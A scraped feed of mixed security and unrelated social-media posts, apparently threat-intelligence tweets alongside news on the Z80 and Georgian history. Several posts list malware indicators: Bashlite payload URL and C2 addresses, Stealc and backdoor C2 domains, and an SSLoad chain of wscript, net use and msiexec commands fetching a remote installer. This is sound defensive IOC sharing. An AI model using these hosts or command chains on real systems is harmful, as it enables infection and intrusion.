1. This is a very interesting photo of an unusual camera and flight controller captured from a russian #drone . One interesting point is that the drone is controlled over LTE using a USB modem.
t.me/serhii_flash/2…

48 ans après sa création, le Z80 tire sa révérence. Un microprocesseur qui aura marqué presque 5 décennies, de la micro-informatique personnelle, aux copieurs en passant par les bornes d'arcade, les PABX, etc ... ❤️

MITRE says state hackers breached its network via Ivanti zero-days bleepingcomputer.com/news/security/…

How to confirm a connection between people

A detailed step-by-step guide of dozens of ways to explore how two social media users interact with each other.

(part of SOWEL - Socmint Weaknesses Enumeration List)

sowel.soxoj.com/Instructions/H…

Contributor Soxoj

the Zilog Z80 is finally being discontinued

design for the Z80 started in 1974, so this CPU made it 50 years

used in many early PCs in the early 80s, and then countless embedded devices

also the CPU for Pac-Man, Sega Genesis, and TI graphing calculators

#Kimsuky #APT
Phishing mail tool found

root:root ? 🤡

IP
195.62.32.227 (🇩🇪 AS198584 PIO-Hosting GmbH)

Payload
http://195.62.32.227/rebirth[.x86

Listener
195.62.32.227:666

C2
195.62.32.227:1337

#Bashlite #Malware #Botnet #DDOS #C2 #Rebirth #ELF

Repeat after me:

Patching an already compromised system won’t solve the problem

#PaloAlto

Les noms IKEA pour les trains
Thread ⤵️⤵️⤵️(réédition)

Le KÏROULLVÏT.

#Scapy a (plus de) 20 ans !

Une affiche dans le rayon, pendant ... 2 mois. Juillet et août ...

Soyons sûrs de ne pas impacter la grande distribution.

A lot of research every day, look at this: I saw a lot of comments like 'random virus' for these IOCs in VirusTotal, but this is a chain of #Stealc #stealer

C2:
heckass\.monster
iigggkkl\.monster
thecurl\.monster
raur94\.com
death1488\.com
89.105.201\.188
tria.ge/240324-s23p1sg…

In our latest blogpost, Quentin Roland presents an often overlooked AD attack surface related to OUs ACLs,with the release of a dedicated exploitation tool, OUned.py (github.com/synacktiv/OUned).
synacktiv.com/publications/o…

Same comment works for the SOC/NOC rooms with big screens everywhere: it is for the show.

The real thing is happening on a 22' display of an analyst filled with ugly splunk queries and a few terminal windows.

Glad to see that Fortinet has posted the IOC's that we have been tracking and sharing to the Community.

In the comments i will share more IOC's related to this Article fortinet.com/blog/threat-re…

#SSLoad - #TA578 - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…

Dll load order hijacking used as persistance. No issues with the plugin installer. Cc: Notepad++

'APT44 is a dynamic and operationally mature threat actor, actively engaged in the full spectrum of espionage, attack, and influence operations.'

Amazing report about Sandworm==APT44. From structural organization about the group and information on strategic targets and goals,

New unk poss #backdoor with many Echo requests😑

I found these C2 (all with 8392 ports):
64.79.86\.26,
64.120.176\.66
74.54.201\.210
173.45.105\.218
174.133.72\.250
185.53.177\.54
211.149.209\.87
bfkq\.com
findhobbits\.com
jsactivity\.com
sendinvest\.com

tria.ge/240319-klzdnaf…

#Russie 🇷🇺 : Le sang des Géorgiens 🧵

Depuis 2 siècles la Géorgie est humiliée et soumise à la Russie. Moscou n’a eu de cesse d’étouffer la volonté d’indépendance de ce territoire. Exécutions, déportations & armements de milices, la Russie cherche à soumettre la Géorgie⤵️

1/24